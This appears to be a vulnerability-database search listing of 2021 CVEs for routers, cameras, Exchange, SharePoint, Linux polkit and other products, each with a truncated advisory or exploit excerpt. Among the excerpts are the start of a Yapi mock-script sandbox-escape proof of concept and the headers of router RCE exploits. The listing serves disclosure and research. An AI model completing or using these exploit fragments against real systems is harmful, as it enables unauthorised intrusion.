56796 matches found
Atlassian Jira File Read Vulnerability (CVE-2021-26086)
...
Fortinet FortiWeb Authenticated Command Injection Vulnerability (CVE-2021-22123)
Fortinet FortiWeb OS Command Injection Aug 17, 2021 5 min read An OS command injection vulnerability in FortiWeb's management interface version 6.3.11 and prior can allow a remote, authenticated attacker to execute arbitrary commands on the system, via the SAML server configuration page. This is ...
Exchange ProxyOracle Information Disclosure Exploit Chain (CVE-2021-31195, CVE-2021-31196)
...
Huayu (华域) reporter Command Injection Vulnerability
...
Cisco Multiple VPN Routers Management Interface Authenticated RCE Vulnerability (CVE-2021-1414)
...
Multiple Vulnerabilities Including Authentication Bypass and RCE in Multiple Buffalo and Arcadyan Routers
Tenable has discovered multiple vulnerabilities in routers manufactured by Arcadyan. During the disclosure process for the issues discovered in the Buffalo routers, Tenable discovered that CVE-2021-20090 affected many more devices, as the root cause of the vulnerability exists in the underlying...
UDP Technology IP Camera Authentication Bypass RCE Vulnerabilities (CVE-2021-33543, CVE-2021-33544)
...
Pulse Connect Secure Authenticated RCE Vulnerability (CVE-2021-22937)
...
Exchange ProxyShell Remote Code Execution Exploit Chain
...
Jetty WEB-INF Information Disclosure Vulnerability (CVE-2021-34428)
...
MCMS fastjson Parsing RCE Vulnerability
...
Elasticsearch ECE 7.13.3 Information Disclosure Vulnerability (CVE-2021-22146)
Exploit Title: Elasticsearch ECE 7.13.3 - Anonymous Database Dump Date: 2021-07-21 Exploit Author: Joan Martinez @magichk Vendor Homepage: https://www.elastic.co/ Software Link: https://www.elastic.co/ Version: = 7.10.0 to = 7.13.3 Tested on: Elastic ECE Cloud CVE : CVE-2021-22146 Reference:...
Denver Smart Wifi Camera SHC-150 - 'Telnet' Remote Code Execution Vulnerability
Exploit Title: Denver Smart Wifi Camera SHC-150 - 'Telnet' Remote Code Execution RCE Date: 27 July 2021 Exploit Author: Ivan Nikolsky enty8080 Vendor Homepage: https://denver.eu/products/smart-home-security/denver-shc-150/c-1024/c-1243/p-3824 Version: Denver SHC-150 all firmware versions Tested o...
Apache Tomcat HTTP Request Smuggling (CVE-2021-33037)
...
Rocket.Chat 3.12.1 Remote Code Execution (CVE-2021-22911)
Title: Rocket.Chat 3.12.1 - NoSQL Injection to RCE Unauthenticated 2 Author: enox Date: 06-06-2021 Product: Rocket.Chat Vendor: https://rocket.chat/ Vulnerable Versions: Rocket.Chat 3.12.1 2 CVE: CVE-2021-22911 Credits: https://blog.sonarsource.com/nosql-injections-in-rocket-chat Info : This is a...
Ehcache RMI Remote Code Execution Vulnerability (CVE-2020-36239)
...
D-LINK DIR-3040 Libcli Command Injection Vulnerability (CVE-2021-21819)
The DIR-3040 is an AC3000-based wireless internet router. As discussed in TALOS-2021-1285, a hidden telnet service can be started without authentication by visiting https:///starttelnet This service presents the user with a login prompt for their “libcli test environment”: $ telnet 192.168.0.1...
D-LINK DIR-3040 Zebra IP Routing Manager Information Disclosure Vulnerability (CVE-2021-21817)
The DIR-3040 is an AC3000-based wireless internet router. Zebra is an IP routing manager that provides kernel routing table updates, interface lookups, and redistribution of routes between different routing protocols. The DIR-3040 runs this service by default on TCP port 2601 and can be accessed ...
D-LINK DIR-3040 Service Component Uses Default Password (CVE-2021-21818)
The DIR-3040 is an AC3000-based wireless internet router. Zebra is an IP routing manager that provides kernel routing table updates, interface lookups, and redistribution of routes between different routing protocols. The DIR-3040 runs this service by default on TCP port 2601 and can be accessed ...
Dell OpenManage Enterprise Docker Instance Pre-Auth RCE and Authentication Bypass Vulnerabilities (CVE-2021-21596)
Details - Remote Auth Bypass with 2 pre-auth RCEs in docker instances There is a chain of pre-auth vulnerabilities allowing to: get a shell on the redis container, as redis get a shell on the postgres container, as postgres get a full access to the postgres database bypass authentication on the w...
woocommerce Plugin SQL Injection Vulnerability
...
NETGEAR GS110TPV3 Unauthenticated Command Injection Vulnerability (CVE-2021-33514)
Summary: Affected Model: NETGEAR GS110TPV3 Smart Managed Pro Switch Firmware Version: V7.0.5.2 from 2021-01-11 NETGEAR GS110TPV3 Smart Managed Pro Switch is vulnerable to a pre-auth shell injection due to incorrect input handling in setup.cgi query parameters. This allows an attacker in the same...
ThinkPHP3.2.x Remote Code Execution
...
Nagiosxi 5.8.4 Authenticated RCE Vulnerability
...
NETGEAR WAC104 Authentication Bypass Vulnerability (CVE-2021-35973)
Summary: Affected Model: NETGEAR WAC104 Dual Band 802.11ac Wireless Access Point Firmware Version: V1.0.4.13 from 2020-09-14 NETGEAR WAC104 Access Point has multiple vulnerabilities which - chained together - allow an attacker in LAN to both change device admin's password, and gain root shell on...
Microsoft SharePoint Server Remote Code Execution Vulnerability (CVE-2021-28474)
In May of 2021, Microsoft released a patch to correct CVE-2021-28474, a remote code execution bug in supported versions of Microsoft SharePoint Server. This bug was reported to ZDI by an anonymous researcher and is also known as ZDI-21-574. This blog takes a deeper look at the root cause of this...
Yapi Remote Command Execution Vulnerability
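How to reproduce this issue: After registering and logging in, create a project. Then choose to set the global mock script and set the command to make a remote request to my server address. Next, add an interface and access the interface's mock address. The server shows the response below, and the remote server receives the request. poc: const sandbox = this const ObjectConstructor = this.constructor const FunctionConstructor = ObjectConstructor.constructor const myfun = FunctionConstructor'return process' const process = myfun...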
IBM QRadar SIEM Server-Side Request Forgery SSRF (CVE-2020-4786)
...
Netgear DGN2200v1 Remote Command Execution
Exploit Title: Netgear DGN2200v1 - Remote Command Execution RCE Unauthenticated Date: 02.07.2021 Exploit Author: SivertPL Vendor Homepage: https://www.netgear.com/ Version: All prior to v1.0.0.60 !/usr/bin/python """ NETGEAR DGN2200v1 Unauthenticated Remote Command Execution Author: SivertPL...
Jspxcms Admin Backend RCE Vulnerability
...
Visual Tools DVR VX16 Unauthenticated Command Injection
...
KGUARD DVR Unauthenticated Command Execution Vulnerability
...
ForgeRock AM Remote Code Execution Vulnerability (CVE-2021-35464)
Pre-auth RCE in ForgeRock OpenAM CVE-2021-35464 Michael Stepankin Researcher @artsploit Published: 29 June 2021 at 11:23 UTC Updated: 29 June 2021 at 18:15 UTC While participating in one private bug bounty program, I discovered a pre-auth RCE in ForgeRock OpenAM server - a popular access manageme...
Node-RED-Dashboard Arbitrary File Read Vulnerability (CVE-2021-3223)
...
IceWarp Unauthenticated RCE Vulnerability
...
IceWarp Reflected XSS Vulnerability (CVE-2020-8512)
...
Weaver (泛微) E-mobile Front-End SQL Injection Vulnerability
...
SonicWall NSM On-Prem Command Execution Vulnerability (CVE-2021-20026)
...
Windows Print Spooler Privilege Escalation Vulnerability (CVE-2021-1675)
...
QNAP Roon Server Unauthenticated RCE Vulnerabilities (CVE-2021-28810, CVE-2021-28811)
...
Linux Polkit Privilege Escalation Vulnerability (CVE-2021-3560)
Privilege escalation with polkit: How to get root on Linux with a seven-year-old bug Kevin Backhouse https://github.blog/author/kevinbackhouse/ polkit is a system service installed by default on many Linux distributions. It's used by systemd, so any Linux distribution that uses systemd also uses...
Joomla Stored XSS Vulnerability (CVE-2021-26032)
JOOMLA PASSWORD RESET VULNERABILITY AND A STORED XSS FOR FULL COMPROMISE Intro Joomla is one of the most popular CMS-es with over 1.5 million installations world-wide. We pentested Joomla 3.9.24 and found a password reset vulnerability which we chained with a set of vulnerabilities and features t...
Atlassian Jira Information Disclosure Vulnerability (CVE-2020-36289)
...
Eclipse Jetty Information Disclosure Vulnerability (CVE-2021-28169)
...
Synology Audio Station Remote Code Execution Vulnerability
...
Lucee Server Unauthenticated RCE Vulnerability (CVE-2021-21307)
Finding 0day to hack Apple Getting started We started hacking on Apple after the infamous blog post by Sam, et al. The goal was to focus on critical findings such as PII exposure or getting access to Apple's servers/internal network. These are the types of bugs we thought Apple would be most...
Yonyou (用友) NC BeanShell Remote Code Execution Vulnerability
...
Changcheng Technology (畅乘科技) - Beidou Active Safety Cloud Platform Default Weak Password
...
CHIYU IoT services Authentication bypass in telnet server(CVE-2021-31251)
...
Microsoft SharePoint Remote Code Execution Vulnerability (CVE-2021-31181)
CVE-2021-31181: MICROSOFT SHAREPOINT WEBPART INTERPRETATION CONFLICT REMOTE CODE EXECUTION VULNERABILITY June 02, 2021 | The ZDI Research Team In May of 2021, Microsoft released a patch to correct CVE-2021-31181 – a remote code execution bug in the supported versions of Microsoft SharePoint Serve...